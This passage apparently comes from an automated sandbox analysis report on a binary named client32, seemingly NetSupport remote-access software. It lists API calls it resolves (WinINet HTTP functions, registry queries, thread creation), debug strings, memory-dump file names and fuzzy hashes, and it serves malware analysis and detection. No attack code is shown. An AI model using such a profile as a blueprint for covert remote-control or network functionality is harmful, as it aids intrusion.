                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                                                                                    • String ID: 358075
                                                                                                                                                    • API String ID: 3037201586-2376970911
                                                                                                                                                    • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                                                    • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                                                                                    • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                                                                    • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00020019,?,00000000,1EF76653,00000000,00020019,?,00000000), ref: 110ED600
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValuewvsprintf
                                                                                                                                                    • String ID: ($Error %d getting %s
                                                                                                                                                    • API String ID: 141982866-3697087921
                                                                                                                                                    • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                                    • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                                                                    • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                                                                    • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                                                                                    • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                                                                                    • API String ID: 2102423945-1777407139
                                                                                                                                                    • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                                                                    • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                                                                                    • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                                                                    • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                                                                                    Strings
                                                                                                                                                    • Error. NULL capbuf, xrefs: 1100B6A1
                                                                                                                                                    • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                                                                                                    • API String ID: 0-3856134272
                                                                                                                                                    • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                    • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                                                                                                    • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                                                                                                    • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: WTSSendMessageA
                                                                                                                                                    • API String ID: 199729137-1676301106
                                                                                                                                                    • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                                                                                    • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                                                                                                    • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                                                                                                    • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                    • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                                    • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                                                                                                    • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 6CA84E34
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 6CA84E6D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: HttpOpenRequestA
• API String ID: 199729137-1149044843
APIs
• GetProcAddress.KERNEL32(?,InternetConnectA), ref: 6CA84C84
• SetLastError.KERNEL32(00000078), ref: 6CA84CBD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: InternetConnectA
• API String ID: 199729137-3259999732
APIs
• SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 11015049
• e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitLastProcessSendwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
• API String ID: 819365019-3966830984
APIs
• wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
• String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
• API String ID: 175691280-2052047905
APIs
• GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 6CA84E94
• SetLastError.KERNEL32(00000078,00000000,?,6CA8B421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA84EC1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: HttpQueryInfoA
• API String ID: 199729137-45432230
APIs
• GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 6CA84CE4
• SetLastError.KERNEL32(00000078,?,?,6CA8B4D8,00000000), ref: 6CA84D11
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: InternetErrorDlg
• API String ID: 199729137-3951532234
APIs
• GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 6CA84EE4
• SetLastError.KERNEL32(00000078,00000000,?,6CA8B3E2,00000000,00000000,00000000,00000000,00000000), ref: 6CA84F11
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: HttpSendRequestA
• API String ID: 199729137-4278235638
APIs
• GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6CA84DE4
• SetLastError.KERNEL32(00000078,?,?,6CA89BCE,?,?,?,?), ref: 6CA84E0D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: InternetWriteFile
• API String ID: 199729137-2273844942
APIs
• GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 6CA84D44
• SetLastError.KERNEL32(00000078,00000000,?,6CA8B392,00000000,0000002B,?,?), ref: 6CA84D6D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: InternetSetOptionA
• API String ID: 199729137-1247460590
APIs
• SetPropA.USER32(?,?,?), ref: 1115F395
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcessPropwsprintf
• String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
• API String ID: 1134434899-3115850912
APIs
• SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 110151F9
• e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Message$ErrorExitLastProcessSendwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
• API String ID: 819365019-3966830984
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: QueueUserWorkItem
                                                                                                                                                    • API String ID: 199729137-2469634949
                                                                                                                                                    • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                    • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                                                                                    • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                                                                                    • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
